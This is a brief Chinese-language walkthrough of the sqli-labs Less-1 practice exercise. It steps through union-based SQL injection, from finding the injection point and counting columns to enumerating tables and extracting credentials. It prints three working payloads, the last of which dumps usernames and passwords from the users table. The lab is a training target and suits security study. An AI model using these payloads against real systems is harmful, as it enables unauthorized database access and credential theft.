sqli-labs的less-1
-
- 1.根据题目信息,提交参数提交参数ID
- 2.判断注入点
-
-
-
- 通常我们会在参数后面加',",/,)等四种形式判断注入点
-
-
- 3.过滤错误的返回值,使其回显正常
-
-
-
-
- 通常我们使用#,--+,-注释符
-
-
-
- 找到临界值,根据回显判断字段数
-
- 4、接下来就是判断可显字段。
- 5、查询数据
- 6.利用union select获取表
- 7. 获取字段
- 8、获取用户名、密码
1.根据题目信息,提交参数提交参数ID
2.判断注入点
通常我们会在参数后面加’,",/,)等四种形式判断注入点
3.过滤错误的返回值,使其回显正常
通常我们使用#,–+,-注释符
找到临界值,根据回显判断字段数
正常回显
不正常回显
所以有三个字段
4、接下来就是判断可显字段。
当id为1时,输入查询语句以后并没有看到回显的数字,这是因为id为1时在数据库中是存在数据的,在存在数据的情况下,会优先输出数据库中的内容:
一般情况下,我们可以在参数前加一个负号。
(如果加负号会报错的话,就换一个数据库里没数据的id参数)
5、查询数据
6.利用union select获取表
0'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
7. 获取字段
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
用户名,密码就是我们所需要的。
8、获取用户名、密码
0' union select 1,group_concat(username,0x3a,password),3 from users--+
课程挺棒的,看懂就可以了解前几题
提示:隔了一段时间写的,有问题请告诉一下。